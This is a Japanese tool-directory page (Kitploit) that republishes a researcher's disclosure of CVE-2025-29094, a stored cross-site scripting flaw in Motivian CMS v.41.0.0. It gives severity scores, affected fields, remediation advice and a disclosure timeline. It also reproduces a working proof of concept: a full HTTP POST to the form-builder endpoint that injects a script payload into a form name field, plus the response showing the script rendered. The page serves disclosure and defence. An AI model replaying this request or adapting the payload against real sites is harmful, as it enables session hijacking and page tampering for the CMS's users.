Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS — このリポジトリは、Motivian Content Management System v.41.0.0で発見されたセキュリティ脆弱性を公開しています。 | Kitploit
ツール/GitHubGitHub/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss
脆弱性分析エクスプロイト情報収集ウェブセキュリティペネトレーションテスト学習と教育
GitHubframarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

このリポジトリは、Motivian Content Management System v.41.0.0で発見されたセキュリティ脆弱性を公開しています。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
6ヶ月前未レビュー

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

このリポジトリは、Motivian Content Management System v.41.0.0 で発見されたセキュリティ脆弱性を公開します。

  • CVE-2025-29094:複数の格納型クロスサイトスクリプティング(XSS)

この脆弱性は、責任ある開示慣行に従ってベンダーに報告され、MITRE にも報告され、暫定的な CVE ID が割り当てられました。詳細は、45日間の開示期間の経過後に公開されています。

一般情報

  • タイトル: Motivian 格納型クロスサイトスクリプティング(XSS)
  • 脆弱性タイプ: 格納型 XSS
  • 製品ベンダー: Motivian
  • 製品: Motivian Content Management System
  • 影響を受けるバージョン: Motivian CMS v.41.0.0
  • 影響を受けるコンポーネント: Marketing/Forms、Marketing/Offers、Content/Pages
  • 攻撃ベクトル: リモート
  • 影響: 被害者のブラウザでの任意の JavaScript 実行
  • 重要度: 高
  • CVSSv3 スコア: 7.6
  • CVSSv3 ベクトル: CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
  • CISA-ADP による重要度: 中
  • CISA-ADP による CVSSv3 スコア: 6.1
  • CISA-ADP による CVSSv3 ベクトル: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • 発見日: 2025-01-29
  • 発見者: Francesco Marcuccio
  • ステータス: 2025年4月7日にベンダーに報告 - 2025年5月22日までに応答/修正なし

説明

Motivian Content Management System v.41.0.0 におけるクロスサイトスクリプティングの脆弱性により、リモートの攻撃者が Marketing/Forms、Marketing/Offers、Content/Pages コンポーネントを介して任意のコードを実行できる可能性があります。この脆弱性は、Marketing/Form および Marketing/Offers のタイトル、Content/Pages の ヘッダースクリプト フィールドなど、さまざまなフィールドに悪意のある JavaScript コードを注入することで悪用されました。

実証概念

この脆弱性は、異なるコンポーネントのさまざまなフィールドを通じて悪用される可能性があります。実証目的で、以下の概念実証は特定のシナリオに焦点を当てています。

  1. Marketing/Forms セクションに移動し、新しいフォーム要素を作成します。
  2. 名前 フィールドに悪意のあるスクリプトを挿入し、フォームを保存します。

以下は、問題を示すために使用された HTTP リクエストとレスポンスの完全な記録です。

Burp リクエスト

root@kitploit:~
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=&currentPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]

Burp レスポンス

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10">&nbsp;</td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd">&nbsp;</td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/HEAD/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]

修正方法

すべてのユーザー入力をサニタイズし、レンダリング前に出力をエスケープします。XSS リスクを軽減するために CSP (Content Security Policy) ヘッダーを実装してください。

開示タイムライン

日付アクション
2025-02-06CVE ID リクエスト (CNA: MITRE)
2025-04-02CVE ID 割り当て
2025-04-07ベンダーに脆弱性を報告

クレジット

  • 発見し、責任を持って開示した者:
    Francesco Marcuccio
    サイバーセキュリティコンサルタント、ペネトレーションテスター

  • MITRE の発見者帰属として記載されている者:
    Francesco Marcuccio
    サイバーセキュリティコンサルタント、ペネトレーションテスター

リンク

参考リンク: MITRE NIST

ステータス

この CVE ID は正式に PUBLISHED ステータスです。NIST による分析後、CVSS スコアが更新される予定です。

ツールをダウンロード
2025-05-31
45日間の開示期間経過後、公開開示 (合計54日)
2025-06-04MITRE データベースおよび NIST/NVD ポータルへの正式登録とエントリ